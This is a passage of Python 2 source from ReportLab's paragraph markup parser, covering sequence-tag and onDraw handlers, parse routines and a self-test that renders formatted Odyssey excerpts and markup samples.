end_seqdefault(self): pass def start_seqreset(self, attr): try: id = attr['id'] except KeyError: id = None try: base = int(attr['base']) except: base=0 self._seq.reset(id, base) def end_seqreset(self): pass def start_seqchain(self, attr): try: order = attr['order'] except KeyError: order = '' order = order.split() seq = self._seq for p,c in zip(order[:-1],order[1:]): seq.chain(p, c) end_seqchain = end_seqreset def start_seqformat(self, attr): try: id = attr['id'] except KeyError: id = None try: value = attr['value'] except KeyError: value = '1' self._seq.setFormat(id,value) end_seqformat = end_seqreset # AR hacking in aliases to allow the proper casing for RML. # the above ones should be deprecated over time. 
2001-03-22 start_seqDefault = start_seqdefault end_seqDefault = end_seqdefault start_seqReset = start_seqreset end_seqReset = end_seqreset start_seqChain = start_seqchain end_seqChain = end_seqchain start_seqFormat = start_seqformat end_seqFormat = end_seqformat def start_seq(self, attr): #if it has a template, use that; otherwise try for id; #otherwise take default sequence if attr.has_key('template'): templ = attr['template'] self.handle_data(templ % self._seq) return elif attr.has_key('id'): id = attr['id'] else: id = None increment = attr.get('inc', None) if not increment: output = self._seq.nextf(id) else: #accepts "no" for do not increment, or an integer. #thus, 0 and 1 increment by the right amounts. if increment.lower() == 'no': output = self._seq.thisf(id) else: incr = int(increment) output = self._seq.thisf(id) self._seq.reset(id, self._seq._this() + incr) self.handle_data(output) def end_seq(self): pass def start_onDraw(self,attr): defn = ABag() if attr.has_key('name'): defn.name = attr['name'] else: self._syntax_error('<onDraw> needs at least a name attribute') if attr.has_key('label'): defn.label = attr['label'] defn.kind='onDraw' self._push(cbDefn=defn) self.handle_data('') self._pop() #--------------------------------------------------------------- def _push(self,**attr): frag = copy.copy(self._stack[-1]) _applyAttributes(frag,attr) self._stack.append(frag) def _pop(self,**kw): frag = self._stack[-1] del self._stack[-1] for k, v in kw.items(): assert getattr(frag,k)==v return frag def getAttributes(self,attr,attrMap): A = {} for k, v in attr.items(): if not self.caseSensitive: k = string.lower(k) if k in attrMap.keys(): j = attrMap[k] func = j[1] try: A[j[0]] = (func is None) and v or func(v) except: self._syntax_error('%s: invalid value %s'%(k,v)) else: self._syntax_error('invalid attribute name %s'%k) return A #---------------------------------------------------------------- def __init__(self,verbose=0): self.caseSensitive = 0 xmllib.XMLParser.__init__(self,verbose=verbose) def _iReset(self): self.fragList = [] if hasattr(self, 'bFragList'): delattr(self,'bFragList') def _reset(self, style): '''reset the parser''' xmllib.XMLParser.reset(self) # initialize list of string segments to empty self.errors = [] self._style = style self._iReset() #---------------------------------------------------------------- def handle_data(self,data): "Creates an intermediate representation of string segments." 
frag = copy.copy(self._stack[-1]) if hasattr(frag,'cbDefn'): kind = frag.cbDefn.kind if data: self._syntax_error('Only empty <%s> tag allowed' % kind) elif hasattr(frag,'_selfClosingTag'): if data!='': self._syntax_error('No content allowed in %s tag' % frag._selfClosingTag) return else: # if sub and super are both on they will cancel each other out if frag.sub == 1 and frag.super == 1: frag.sub = 0 frag.super = 0 if frag.sub: frag.rise = -frag.fontSize*subFraction frag.fontSize = max(frag.fontSize-sizeDelta,3) elif frag.super: frag.rise = frag.fontSize*superFraction frag.fontSize = max(frag.fontSize-sizeDelta,3) if frag.greek: frag.fontName = 'symbol' data = _greekConvert(data) # bold, italic, and underline frag.fontName = tt2ps(frag.fontName,frag.bold,frag.italic) #save our data frag.text = data if hasattr(frag,'isBullet'): delattr(frag,'isBullet') self.bFragList.append(frag) else: self.fragList.append(frag) def handle_cdata(self,data): self.handle_data(data) def _setup_for_parse(self,style): self._seq = reportlab.lib.sequencer.getSequencer() self._reset(style) # reinitialise the parser def parse(self, text, style): """Given a formatted string will return a list of ParaFrag objects with their calculated widths. If errors occur None will be returned and the self.errors holds a list of the error messages. """ # AR 20040612 - when we feed Unicode strings in, sgmlop # tries to coerce to ASCII. Must intercept, coerce to # any 8-bit encoding which defines most of 256 points, # and revert at end. Yuk. Preliminary step prior to # removal of parser altogether. enc = self._enc = 'utf8' #our legacy default self._UNI = type(text) is UnicodeType if self._UNI: text = text.encode(enc) self._setup_for_parse(style) # the xmlparser requires that all text be surrounded by xml # tags, therefore we must throw some unused flags around the # given string if not(len(text)>=6 and text[0]=='<' and _re_para.match(text)): text = "<para>"+text+"</para>" self.feed(text) self.close() # force parsing to complete return self._complete_parse() def _complete_parse(self): del self._seq style = self._style del self._style if len(self.errors)==0: fragList = self.fragList bFragList = hasattr(self,'bFragList') and self.bFragList or None self._iReset() else: fragList = bFragList = None if self._UNI: #reconvert to unicode if fragList: for frag in fragList: frag.text = unicode(frag.text, self._enc) if bFragList: for frag in bFragList: frag.text = unicode(frag.text, self._enc) return style, fragList, bFragList def _tt_parse(self,tt): tag = tt[0] try: start = getattr(self,'start_'+tag) end = getattr(self,'end_'+tag) except AttributeError: raise ValueError('Invalid tag "%s"' % tag) start(tt[1] or {}) C = tt[2] if C: M = self._tt_handlers for c in C: M[type(c) is TupleType](c) end() def tt_parse(self,tt,style): '''parse from tupletree form''' self._setup_for_parse(style) self._tt_handlers = self.handle_data,self._tt_parse self._tt_parse(tt) return self._complete_parse() if __name__=='__main__': from reportlab.platypus import cleanBlockQuotedText _parser=ParaParser() def check_text(text,p=_parser): print '##########' text = cleanBlockQuotedText(text) l,rv,bv = p.parse(text,style) if rv is None: for l in _parser.errors: print l else: print 'ParaStyle', l.fontName,l.fontSize,l.textColor for l in rv: print l.fontName,l.fontSize,l.textColor,l.bold, l.rise, '|%s|'%l.text[:25], if hasattr(l,'cbDefn'): print 'cbDefn',getattr(l.cbDefn,'name',''),getattr(l.cbDefn,'label',''),l.cbDefn.kind else: print style=ParaFrag() 
style.fontName='Times-Roman' style.fontSize = 12 style.textColor = black style.bulletFontName = black style.bulletFontName='Times-Roman' style.bulletFontSize=12 text=''' <b><i><greek>a</greek>D</i></b>&beta;<unichr value="0x394"/> <font name="helvetica" size="15" color=green> Tell me, O muse, of that ingenious hero who travelled far and wide after</font> he had sacked the famous town of Troy. Many cities did he visit, and many were the nations with whose manners and customs he was acquainted; moreover he suffered much by sea while trying to save his own life and bring his men safely home; but do what he might he could not save his men, for they perished through their own sheer folly in eating the cattle of the Sun-god Hyperion; so the god prevented them from ever reaching home. Tell me, too, about all these things, O daughter of Jove, from whatsoever source you<super>1</super> may know them. ''' check_text(text) check_text('<para> </para>') check_text('<para font="times-bold" size=24 leading=28.8 spaceAfter=72>ReportLab -- Reporting for the Internet Age</para>') check_text(''' <font color=red>&tau;</font>Tell me, O muse, of that ingenious hero who travelled far and wide after he had sacked the famous town of Troy. Many cities did he visit, and many were the nations with whose manners and customs he was acquainted; moreover he suffered much by sea while trying to save his own life and bring his men safely home; but do what he might he could not save his men, for they perished through their own sheer folly in eating the cattle of the Sun-god Hyperion; so the god prevented them from ever reaching home. Tell me, too, about all these things, O daughter of Jove, from whatsoever source you may know them.''') check_text(''' Telemachus took this speech as of good omen and rose at once, for he was bursting with what he had to say. He stood in the middle of the assembly and the good herald Pisenor brought him his staff. Then, turning to Aegyptius, "Sir," said he, "it is I, as you will shortly learn, who have convened you, for it is I who am the most aggrieved. I have not got wind of any host approaching about which I would warn you, nor is there any matter of public moment on which I would speak. My grieveance is purely personal, and turns on two great misfortunes which have fallen upon my house. The first of these is the loss of my excellent father, who was chief among all you here present, and was like a father to every one of you; the second is much more serious, and ere long will be the utter ruin of my estate. The sons of all the chief men among you are pestering my mother to marry them against her will. They are afraid to go to her father Icarius, asking him to choose the one he likes best, and to provide marriage gifts for his daughter, but day by day they keep hanging about my father's house, sacrificing our oxen, sheep, and fat goats for their banquets, and never giving so much as a thought to the quantity of wine they drink. No estate can stand such recklessness; we have now no Ulysses to ward off harm from our doors, and I cannot hold my own against them. I shall never all my days be as good a man as he was, still I would indeed defend myself if I had power to do so, for I cannot stand such treatment any longer; my house is being disgraced and ruined. Have respect, therefore, to your own consciences and to public opinion. Fear, too, the wrath of heaven, lest the gods should be displeased and turn upon you. 
I pray you by Jove and Themis, who is the beginning and the end of councils, [do not] hold back, my friends, and leave me singlehanded- unless it be that my brave father Ulysses did some wrong to the Achaeans which you would now avenge on me, by aiding and abetting these suitors. Moreover, if I am to be eaten out of house and home at all, I had rather you did the eating yourselves, for I could then take action against you to some purpose, and serve you with notices from house to house till I got paid in full, whereas now I have no remedy."''') check_text(''' But as the sun was rising from the fair sea into the firmament of heaven to shed light on mortals and immortals, they reached Pylos the city of Neleus. Now the people of Pylos were gathered on the sea shore to offer sacrifice of black bulls to Neptune lord of the Earthquake. There were nine guilds with five hundred men in each, and there were nine bulls to each guild. As they were eating the inward meats and burning the thigh bones [on the embers] in the name of Neptune, Telemachus and his crew arrived, furled their sails, brought their ship to anchor, and went ashore. ''') check_text(''' So the neighbours and kinsmen of Menelaus were feasting and making merry in his house. There was a bard also to sing to them and play his lyre, while two tumblers went about performing in the midst of them when the man struck up with his tune.]''') check_text(''' "When we had passed the [Wandering] rocks, with Scylla and terrible Charybdis, we reached the noble island of the sun-god, where were the goodly cattle and sheep belonging to the sun Hyperion. While still at sea in my ship I could bear the cattle lowing as they came home to the yards, and the sheep bleating. Then I remembered what the blind Theban prophet Teiresias had told me, and how carefully Aeaean Circe had warned me to shun the island of the blessed sun-god. So being much troubled I said to the men, 'My men, I know you are hard pressed, but listen while I <strike>tell you the prophecy that</strike> Teiresias made me, and how carefully Aeaean Circe warned me to shun the island of the blessed sun-god, for it was here, she said, that our worst danger would lie. Head the ship, therefore, away from the island.''') check_text('''A&lt;B&gt;C&amp;D&quot;E&apos;F''') check_text('''A&lt; B&gt; C&amp; D&quot; E&apos; F''') check_text('''<![CDATA[<>&'"]]>''') check_text('''<bullet face=courier size=14 color=green>+</bullet> There was a bard also to sing to them and play his lyre, while two tumblers went about performing in the midst of them when the man struck up with his tune.]''') check_text('''<onDraw name="myFunc" label="aaa bbb">A paragraph''') check_text('''<para><onDraw name="myFunc" label="aaa bbb">B paragraph</para>''') # HVB, 30.05.2003: Test for new features _parser.caseSensitive=0 check_text('''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''') check_text('''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''') check_text('''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''') check_text('''Before the break <br/>the middle line <br/> and the last line.''') check_text('''This should be an inline image <img src='../docs/images/testimg.gif'/>!''') check_text('''aaa&nbsp;bbbb <u>underline&#32;</u> cccc''')
bsd-3-clause
6,241,397,755,660,166,000
34.284906
135
0.557778
false
3.475699
false
false
false
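The check_text calls in the record above exercise ReportLab's intra-paragraph XML markup (<font>, <b>/<i>, <bullet>, character entities). As a hedged sketch of how one such markup string is rendered through the public Paragraph API (the output filename "markup_demo.pdf" is made up for illustration):
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import SimpleDocTemplate, Paragraph

# Render one markup string of the kind the test feeds to check_text.
styles = getSampleStyleSheet()
story = [Paragraph(
    'Here comes <font face="Helvetica" size="14">Helvetica 14</font> '
    'with <b>strong</b> <i>emphasis</i>.', styles["Normal"])]
SimpleDocTemplate("markup_demo.pdf").build(story)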
romulojales/to-be-musician
to_be_a_musician/songs/migrations/0005_remove_duplicate_slugs.py
1
7856
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import DataMigration from django.db import models class Migration(DataMigration): def forwards(self, orm): "Write your forwards methods here." # Note: Don't use "from appname.models import ModelName". # Use orm.ModelName to refer to models in this application, # and orm['appname.ModelName'] for models in other applications. songs = orm.Song.objects.select_related().order_by('artist__name', 'album__name', 'slug', 'id') for song in songs: duplicated_songs = (orm.Song.objects .filter(artist__slug=song.artist.slug, album__slug=song.album.slug, slug=song.slug) .exclude(pk=song.pk)) i = 1 for duplicated_song in duplicated_songs: duplicated_song.slug = '{0}-{1}'.format(duplicated_song.slug[:47], i) duplicated_song.save() i += 1 def backwards(self, orm): raise RuntimeError('Cannot reverse this migration.') models = { u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, u'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': 
('django.db.models.fields.CharField', [], {'max_length': '100'}) }, u'songs.album': { 'Meta': {'object_name': 'Album'}, 'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}) }, u'songs.artist': { 'Meta': {'object_name': 'Artist'}, 'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}) }, u'songs.interpretation': { 'Meta': {'object_name': 'Interpretation'}, 'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'song': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Song']"}), 'songsterr_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'soundcloud_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'uuid': ('django.db.models.fields.CharField', [], {'max_length': '36', 'blank': 'True'}), 'youtube_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}) }, u'songs.song': { 'Meta': {'object_name': 'Song'}, 'album': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Album']"}), 'api_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}), 'artist': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['songs.Artist']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), 'tinysong_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) } } complete_apps = ['songs'] symmetrical = True
apache-2.0
-7,906,301,131,644,745,000
69.142857
208
0.53055
false
3.739172
false
false
false
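In effect, forwards() above keeps the first song's slug and renames later duplicates with "-1", "-2", ... suffixes, truncating the base to 47 characters so the suffixed slug stays within the 50-character field. A standalone sketch of that renaming rule (plain strings, no ORM):
def dedupe_slugs(slugs):
    # First occurrence keeps its slug; later duplicates get a counter suffix.
    seen = {}
    out = []
    for slug in slugs:
        if slug in seen:
            seen[slug] += 1
            out.append('{0}-{1}'.format(slug[:47], seen[slug]))
        else:
            seen[slug] = 0
            out.append(slug)
    return out

print(dedupe_slugs(['hey-jude', 'hey-jude', 'hey-jude']))
# -> ['hey-jude', 'hey-jude-1', 'hey-jude-2']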
dontnod/weblate
weblate/trans/migrations/0021_auto_20190321_1004.py
1
3976
# -*- coding: utf-8 -*- # Generated by Django 1.11.17 on 2019-03-21 10:04 from __future__ import unicode_literals import django.db.models.deletion from django.db import migrations, models class Migration(migrations.Migration): dependencies = [("trans", "0020_auto_20190321_0921")] operations = [ migrations.AddField( model_name="change", name="alert", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.Alert", ), ), migrations.AddField( model_name="change", name="whiteboard", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.WhiteboardMessage", ), ), migrations.AlterField( model_name="change", name="action", field=models.IntegerField( choices=[ (0, "Resource update"), (1, "Translation completed"), (2, "Translation changed"), (5, "New translation"), (3, "Comment added"), (4, "Suggestion added"), (6, "Automatic translation"), (7, "Suggestion accepted"), (8, "Translation reverted"), (9, "Translation uploaded"), (10, "Glossary added"), (11, "Glossary updated"), (12, "Glossary uploaded"), (13, "New source string"), (14, "Component locked"), (15, "Component unlocked"), (16, "Found duplicated string"), (17, "Committed changes"), (18, "Pushed changes"), (19, "Reset repository"), (20, "Merged repository"), (21, "Rebased repository"), (22, "Failed merge on repository"), (23, "Failed rebase on repository"), (28, "Failed push on repository"), (24, "Parse error"), (25, "Removed translation"), (26, "Suggestion removed"), (27, "Search and replace"), (29, "Suggestion removed during cleanup"), (30, "Source string changed"), (31, "New string added"), (32, "Bulk status change"), (33, "Changed visibility"), (34, "Added user"), (35, "Removed user"), (36, "Translation approved"), (37, "Marked for edit"), (38, "Removed component"), (39, "Removed project"), (40, "Found duplicated language"), (41, "Renamed project"), (42, "Renamed component"), (43, "Moved component"), (44, "New string to translate"), (45, "New contributor"), (46, "New whiteboard message"), (47, "New component alert"), ], default=2, ), ), migrations.AlterField( model_name="change", name="comment", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.Comment", ), ), migrations.AlterField( model_name="change", name="suggestion", field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.SET_NULL, to="trans.Suggestion", ), ), ]
gpl-3.0
-1,935,226,728,235,325,400
36.158879
62
0.429326
false
5.026549
false
false
false
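The two AddField operations above amount to nullable foreign keys that survive deletion of their target. A sketch of the equivalent model declaration (the Change model is reduced to just these two fields; everything else is omitted):
from django.db import models

class Change(models.Model):
    # Deleting the referenced Alert or WhiteboardMessage keeps this row
    # and sets the pointer to NULL instead of cascading the delete.
    alert = models.ForeignKey(
        "trans.Alert", null=True, on_delete=models.SET_NULL)
    whiteboard = models.ForeignKey(
        "trans.WhiteboardMessage", null=True, on_delete=models.SET_NULL)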
lukerosiak/inspectors-general
inspectors/treasury.py
2
15149
#!/usr/bin/env python import datetime import logging import os import re from urllib.parse import urljoin, unquote from utils import utils, inspector, admin # https://www.treasury.gov/about/organizational-structure/ig/Pages/audit_reports_index.aspx archive = 2005 # options: # standard since/year options for a year range to fetch from. # # Notes for IG's web team: # - Add an agency for report 'OIG-09-015' listed on # https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2009.aspx # - There is an extra tr.ms-rteTableEvenRow-default at the end of # https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-2014.aspx # - Add published dates for all reports at # https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx # - OIG-07-003 is posted twice, once with the wrong date AUDIT_REPORTS_BASE_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/by-date-{}.aspx" TESTIMONIES_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/testimony_index.aspx" PEER_AUDITS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/peer_audit_reports_index.aspx" OTHER_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/other-reports.aspx" SEMIANNUAL_REPORTS_URL = "https://www.treasury.gov/about/organizational-structure/ig/Pages/semiannual_reports_index.aspx" AGENCY_NAMES = { "bep": "The Bureau of Engraving & Printing", "bfs": "The Bureau of the Fiscal Service", "bpd": "The Bureau of the Public Debt", "cdfi": "The Community Development Financial Institution Fund", "cfpb": "Consumer Financial Protection Bureau", "do": "Department of the Treasury", "esf": "Exchange Stabilization Fund", "ffb": "Federal Financing Bank", "fcen": "The Financial Crimes Enforcement Network", "fincen": "The Financial Crimes Enforcement Network", # Another slug for the above "fms": "Financial Management Service", "gcerc": "Gulf Coast Ecosystem Restoration Council", "ia": "The Office of International Affairs", "mint": "The U.S. 
Mint", "occ": "The Office of the Comptroller of the Currency", "odcp": "Office of DC Pensions", "ofac": "The Office of Foreign Assets Control", "ofr": "Office of Financial Research", "oig": "Office of the Inspector General", "ots": "The Office of Thrift Supervision", "restore": "The RESTORE Act", "sblf": "Small Business Lending Fund", "ssbci": "State Small Business Credit Initiative", "tfi": "Office of Terrorism and Financial Intelligence", "ttb": "The Alcohol and Tobacco Tax and Trade Bureau", "tff": "Treasury Forfeiture Fund", } OTHER_URLS = { "testimony": TESTIMONIES_URL, "peer_review": PEER_AUDITS_URL, "other": OTHER_REPORTS_URL, } UNRELEASED_REPORTS = [ # These reports do not say they are unreleased, but there are no links "IGATI 2006", "IGATI 2007", "OIG-CA-07-001", "OIG-08-039", "OIG-08-013", ] REPORT_AGENCY_MAP = { "OIG-09-015": "mint", # See note to IG web team } REPORT_PUBLISHED_MAP = { "OIG-CA-13-006": datetime.datetime(2013, 3, 29), "OIG-13-CA-008": datetime.datetime(2013, 6, 10), "Treasury Freedom of Information Act (FOIA) Request Review": datetime.datetime(2010, 11, 19), "OIG-CA-14-017": datetime.datetime(2014, 9, 30), "OIG-CA-14-015": datetime.datetime(2014, 9, 4), "OIG-CA-15-023": datetime.datetime(2015, 7, 29), "OIG-CA-15-020": datetime.datetime(2015, 6, 22), "OIG-15-CA-012": datetime.datetime(2015, 4, 7), "OIG-CA-15-024": datetime.datetime(2015, 9, 15), "M-12-12 Reporting": datetime.datetime(2016, 1, 28), "OIG-CA-16-012": datetime.datetime(2016, 3, 30), "OIG-CA-16-014": datetime.datetime(2016, 4, 19), "Role of Non-Career Officials in Treasury FOIA Processing": datetime.datetime(2016, 3, 9), "OIG-CA-16-028": datetime.datetime(2016, 6, 30), "OIG-CA-16-033A": datetime.datetime(2016, 7, 29), "OIG-CA-16-033B": datetime.datetime(2016, 7, 29), "OIG-CA-17-006": datetime.datetime(2016, 11, 10), "OIG-CA-17-009": datetime.datetime(2017, 1, 27), "OIG-CA-17-010": datetime.datetime(2017, 1, 27), "OIG-CA-17-012": datetime.datetime(2017, 2, 27), "OIG-CA-17-013": datetime.datetime(2017, 3, 1), } def run(options): year_range = inspector.year_range(options, archive) if datetime.datetime.now().month >= 10: # October, November, and December fall into the next fiscal year # Add next year to year_range to compensate year_range.append(max(year_range) + 1) # Pull the audit reports for year in year_range: if year < 2006: # This is the oldest year for these reports continue url = AUDIT_REPORTS_BASE_URL.format(year) doc = utils.beautifulsoup_from_url(url) results = doc.find_all("tr", class_=["ms-rteTableOddRow-default", "ms-rteTableEvenRow-default"]) if not results: if year != datetime.datetime.now().year + 1: raise inspector.NoReportsFoundError("Treasury (%d)" % year) for result in results: report = audit_report_from(result, url, year_range) if report: inspector.save_report(report) for report_type, url in OTHER_URLS.items(): doc = utils.beautifulsoup_from_url(url) results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p a") if not results: raise inspector.NoReportsFoundError("Treasury (%s)" % report_type) for result in results: if len(result.parent.find_all("a")) == 1: result = result.parent report = report_from(result, url, report_type, year_range) if report: inspector.save_report(report) doc = utils.beautifulsoup_from_url(SEMIANNUAL_REPORTS_URL) results = doc.select("#ctl00_PlaceHolderMain_ctl05_ctl01__ControlWrapper_RichHtmlField > p > a") if not results: raise inspector.NoReportsFoundError("Treasury (semiannual reports)") for result in results: report = 
semiannual_report_from(result, SEMIANNUAL_REPORTS_URL, year_range) if report: inspector.save_report(report) def clean_text(text): # A lot of text on this page has extra characters return text.replace('\u200b', '').replace('\ufffd', ' ').replace('\xa0', ' ').strip() SUMMARY_RE = re.compile("(OIG|OIG-CA|EVAL) *-? *([0-9]+) *- *([0-9R]+) *[:,]? +([^ ].*)") SUMMARY_FALLBACK_RE = re.compile("([0-9]+)-(OIG)-([0-9]+) *:? *(.*)") FILENAME_RE = re.compile("^(OIG-[0-9]+-[0-9]+)\\.pdf") def audit_report_from(result, page_url, year_range): if not clean_text(result.text): # Empty row return # Get all direct child nodes children = list(result.find_all(True, recursive=False)) published_on_text = clean_text(children[1].text) # this is the header row if published_on_text.strip() == "Date": return None date_formats = ['%m/%d/%Y', '%m/%d%Y'] published_on = None for date_format in date_formats: try: published_on = datetime.datetime.strptime(published_on_text, date_format) except ValueError: pass report_summary = clean_text(children[2].text) if not report_summary: # There is an extra row that we want to skip return report_summary = report_summary.replace("OIG-15-38Administrative", "OIG-15-38 Administrative") summary_match = SUMMARY_RE.match(report_summary) summary_match_2 = SUMMARY_FALLBACK_RE.match(report_summary) if summary_match: report_id = summary_match.expand(r"\1-\2-\3") title = summary_match.group(4) elif summary_match_2: report_id = summary_match_2.expand(r"\2-\1-\3") title = summary_match_2.group(4) elif report_summary.startswith("IGATI") and published_on is not None: # There are two such annual reports from different years, append the year report_id = "IGATI %d" % published_on.year title = report_summary elif report_summary == "Report on the Bureau of the Fiscal Service Federal " \ "Investments Branch\u2019s Description of its Investment/" \ "Redemption Services and the Suitability of the Design and Operating " \ "Effectiveness of its Controls for the Period August 1, 2013 to " \ "July 31, 2014": # This one is missing its ID in the index report_id = "OIG-14-049" title = report_summary elif report_summary == "Correspondence related to the resolution of audit recommendation 1 OIG-16-001 OFAC Libyan Sanctions Case Study (Please read this correspondence in conjunction with the report.)": # Need to make up a report_id for this supplemental document report_id = "OIG-16-001-resolution" title = report_summary else: try: filename_match = FILENAME_RE.match(os.path.basename(result.a["href"])) report_id = filename_match.group(1) title = report_summary except (ValueError, IndexError, AttributeError): raise Exception("Couldn't parse report ID: %s" % repr(report_summary)) if report_id == 'OIG-15-015' and \ 'Financial Statements for hte Fiscal Years 2014 and 2013' in title: # This report is listed twice, once with a typo return if report_id == 'OIG-07-003' and published_on_text == '11/23/2006': # This report is listed twice, once with the wrong date return # There are copy-paste errors with several retracted reports if report_id == 'OIG-14-037': if published_on.year == 2011 or published_on.year == 2010: return if report_id == 'OIG-13-021' and published_on_text == '12/12/2012': return if published_on is None: admin.log_no_date("treasury", report_id, title) return agency_slug_text = children[0].text if report_id in REPORT_AGENCY_MAP: agency_slug = REPORT_AGENCY_MAP[report_id] else: agency_slug = clean_text(agency_slug_text.split("&")[0]).lower() if (report_id in UNRELEASED_REPORTS or "If you would like a copy of 
this report" in report_summary or "If you would like to see a copy of this report" in report_summary or "have been removed from the OIG website" in report_summary or "removed the auditors\u2019 reports from the" in report_summary or "Classified Report" in report_summary or "Classified Audit Report" in report_summary or "Sensitive But Unclassified" in report_summary or "To obtain further information, please contact the OIG" in report_summary): unreleased = True report_url = None landing_url = page_url else: link = result.select("a")[0] report_url = urljoin(AUDIT_REPORTS_BASE_URL, link['href']) if report_url == AUDIT_REPORTS_BASE_URL: raise Exception("Invalid link found: %s" % link) unreleased = False landing_url = None # HTTPS, even if they haven't updated their links yet if report_url is not None: report_url = re.sub("^http://www.treasury.gov", "https://www.treasury.gov", report_url) if report_url == "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG-11-071.pdf": report_url = "https://www.treasury.gov/about/organizational-structure/ig/Documents/OIG11071.pdf" if published_on.year not in year_range: logging.debug("[%s] Skipping, not in requested range." % report_url) return report = { 'inspector': 'treasury', 'inspector_url': 'https://www.treasury.gov/about/organizational-structure/ig/', 'agency': agency_slug, 'agency_name': AGENCY_NAMES[agency_slug], 'type': 'audit', 'report_id': report_id, 'url': report_url, 'title': title, 'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"), } if unreleased: report['unreleased'] = 